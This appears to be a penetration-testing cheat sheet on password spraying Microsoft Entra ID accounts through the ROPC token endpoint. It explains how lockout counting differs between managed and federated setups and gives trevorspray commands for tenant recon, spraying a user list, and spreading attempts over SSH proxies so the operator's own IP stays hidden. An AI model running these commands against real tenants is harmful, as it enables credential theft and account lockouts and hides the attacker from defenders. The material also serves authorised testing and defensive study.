Entra Token/ROPC

Managed vs Federated (account lockout risks)

• Federated and Managed + PTA: failed logins can accrue at AD (validation occurs on‑prem). Azure AD Smart Lockout may intercept before AD is hit, depending on thresholds.
• Managed + PHS (no PTA): failed logins accrue at Entra (Smart Lockout).

Spraying via Entra succeeds only when the ROPC grant is allowed for the target app and tenant. Federated users generally won't ROPC (no redirect to IdP). Note: ROPC isn't supported for hybrid federation; PTA is supported. Rare exception: HRD with AllowCloudPasswordValidation + synced password.

Check if a domain is managed or federated

trevorspray --recon <domain>

ROPC Token Endpoint Spraying

ROPC Token Endpoint

https://login.microsoftonline.com/<tenant_id_or_domain>/oauth2/v2.0/token

ROPC must be enabled on the app (allow public client flows). Federated users typically fail; managed users may succeed if ROPC isn't blocked.

TREVORspray - Automated ROPC Spraying

Password spray against `token_endpoint`

trevorspray -u <user_list> -p '<password>' --url https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token

Password spray wtih round robin SSH proxy

trevorspray -u <user_list> -p '<password>' --ssh root@<ssh_server> root@<ssh_server> -k <ssh_key>

Add -n to only spray using proxies, not your current IP.